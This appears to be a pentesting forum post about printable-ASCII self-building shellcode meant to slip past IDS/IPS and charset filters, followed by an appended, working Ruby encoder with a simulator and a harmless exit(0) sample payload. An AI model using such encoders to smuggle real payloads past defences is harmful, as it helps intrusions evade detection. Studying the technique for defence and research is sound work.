Hi, guys. In my travels and adventures into the exciting world of pentesting, I've come across something I feel is cool. So here's the deal.
I've looked through the encoding tools in the msframework, those that were described in Metasploit: The Penetration Tester's Guide, and those that were described in Grey Hat Hacking...
What I've noticed is that they pretty much all follow the same standard: XOR against a key, with the final exploit looking like this:
encrypted shellcode -> decryption loop -> decrypted shellcode
The program decrypts itself then jumps to the new shellcode and runs.
All very nice and pretty. But...
This won't bypass systems using advanced IPS/IDS to monitor packets, and it also won't pass validation on a printable-charset-only lookup.
So, Hacking: A Guide to Exploitation gives a solution that I have yet to see implemented. Namely, self-building shellcode. Meaning, the shellcode builds itself using only printable chars.
Something like this: since PUSH EAX, SUB EAX, and a few others all correspond to printable ASCII chars, we can zero out EAX, then subtract by way of rollover to get EAX to the instruction bytes we want, then push it to the stack. This usually only takes 3 SUBs for each 4 bytes pushed to the stack. By subtracting down to the last four bytes of the SC (shellcode), pushing them to the stack, and moving on to the next four until all of it is pushed, we can bypass all those mentioned protection systems.
The next step would either be to SUB to 4 NOPs and PUSH EAX until the SC overwrites itself and slides down to the payload, or just to JMP to the actual payload immediately.
Setting up the subtraction using only printable bytes usually doesn't take more than three instructions, since the ASCII charset can be used to subtract, obviously. It looks something like this:
SUB EAX, 0x41434547 (f - D C B A, or something very similar; I hexdumped this from SUB EAX, 0x41424344 compiled with NASM)
PUSH EAX (the last four bytes)
PUSH EAX (the next four bytes)
... until all the SC is written, all of this being contained within a printable string.
What I want to do is write a metasploit module to take a given payload, and make it self-building.
What I want from the community is:
I've never written a metasploit module, programmed in ruby, or done anything like this really. I want to know if it's a good idea, if it's implementable, and if people are interested.
I'm willing to put in work, but I don't know enough to do this on my own. Please help, people.
1) Will this work?
2) What is the best way to implement it?
3) General suggestions and improvements
I understand that this may only be practical on non-exe (i.e. only standard network) exploits, but if it helps the success of even those, why not do it?
Let me know.
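As an added example that is not part of the original post and not Metasploit's or the author's own code: the SUB/PUSH self-building technique described above, written as a small Ruby encoder (Ruby because the stated goal is a Metasploit module). It zeroes EAX with two AND EAX,imm32 whose immediates are printable and AND to zero, then for every dword of the payload (last dword first, since the stack grows down) emits three SUB EAX,imm32 whose bytes are all in 0x21..0x7e, followed by PUSH EAX. Working relative to the dword already in EAX avoids re-zeroing between pushes. The layout assumption, same as in the post, is that ESP already points just past the end of the printable string when it runs, so the pushed bytes land directly after it; the bridge to the rebuilt payload (NOP pushes or a JMP) is deliberately not generated. The sample payload is a constructed Linux x86 exit(0) stub, and the small interpreter at the end only exists so the encoder's output can be checked offline.

```ruby
# Added example (not from the original post): printable-only "self-building"
# shellcode encoder in the SUB/PUSH style. Assumption (hypothetical layout): at
# run time ESP points just past the last byte of the produced string, so every
# PUSH lands the rebuilt payload right after the decoder. The final bridge
# (NOP pushes or a JMP into the payload) is not generated here.

PRINTABLE = (0x21..0x7e)            # '!'..'~': no NUL, no control bytes, no space

# Zero EAX with two AND EAX,imm32 (opcode 0x25 = '%'). The immediates are
# "JONE" (0x454e4f4a) and "501:" (0x3a313035): they AND to 0 and every byte
# of the 10-byte sequence is printable.
ZERO_EAX = "%JONE%501:".b.freeze

# Pick three printable bytes b0,b1,b2 with b0+b1+b2+carry_in == want (mod 256).
# Three printable bytes sum to 0x63..0x17a, so every residue mod 256 is reachable.
# Returns [[b0, b1, b2], carry_out].
def split_byte(want, carry_in)
  m = (want - carry_in) % 256
  s = m >= 0x63 ? m : m + 256
  parts = []
  remaining = s
  3.times do |j|
    floor = 0x21 * (2 - j)                      # minimum the bytes still to pick need
    take = [remaining - floor, 0x7e].min
    parts << take
    remaining -= take
  end
  raise "byte split failed" unless remaining.zero? && parts.all? { |b| PRINTABLE.cover?(b) }
  [parts, (s + carry_in) / 256]
end

# Three SUB immediates a,b,c with (eax - a - b - c) mod 2**32 == target and
# every byte of every immediate printable. Working relative to the current EAX
# (the dword pushed last time) saves re-zeroing EAX before each dword.
def sub_immediates(eax, target)
  need = (eax - target) % 2**32
  imms = [0, 0, 0]
  carry = 0
  4.times do |i|
    parts, carry = split_byte((need >> (8 * i)) & 0xff, carry)
    3.times { |k| imms[k] |= parts[k] << (8 * i) }
  end
  imms
end

# Turn an arbitrary payload into a printable string that rebuilds it on the stack.
# The payload is NOP-padded at the front to a multiple of 4; dwords are pushed last-first.
def encode_printable(payload)
  payload = payload.b
  payload = ("\x90".b * ((4 - payload.bytesize % 4) % 4)) + payload
  out = ZERO_EAX.dup
  eax = 0
  payload.unpack("V*").reverse_each do |dword|
    sub_immediates(eax, dword).each { |imm| out << "-".b << [imm].pack("V") }  # SUB EAX,imm32 (0x2d)
    out << "P".b                                                                # PUSH EAX (0x50)
    eax = dword
  end
  out
end

def printable?(str)
  str.each_byte.all? { |b| PRINTABLE.cover?(b) }
end

# Tiny interpreter for the three instruction forms the encoder emits. Returns the
# bytes left on the stack, lowest address first, which should equal the (padded) payload.
def simulate(code)
  eax = 0
  stack = []
  i = 0
  while i < code.bytesize
    case code.getbyte(i)
    when 0x25 then eax &= code.byteslice(i + 1, 4).unpack1("V"); i += 5                # AND EAX,imm32
    when 0x2d then eax = (eax - code.byteslice(i + 1, 4).unpack1("V")) % 2**32; i += 5 # SUB EAX,imm32
    when 0x50 then stack.unshift(eax); i += 1                                           # PUSH EAX
    else raise format("unexpected opcode %02x at offset %d", code.getbyte(i), i)
    end
  end
  stack.pack("V*")
end

# Constructed sample payload: Linux x86 exit(0) stub
# (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80).
SAMPLE_PAYLOAD = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80".b.freeze

if $PROGRAM_NAME == __FILE__
  enc = encode_printable(SAMPLE_PAYLOAD)
  puts enc
  puts "printable: #{printable?(enc)}, rebuilds payload: #{simulate(enc) == SAMPLE_PAYLOAD}"
end
```

Each dword costs 3 x 5 bytes of SUB plus one byte of PUSH, so the output is roughly four times the payload size plus the 10-byte zeroing prefix; a real module would also need to take the target's bad-character list into account (this example only enforces 0x21..0x7e) and to emit the post's NOP-push or JMP bridge once the distance between the decoder and the rebuilt payload is known.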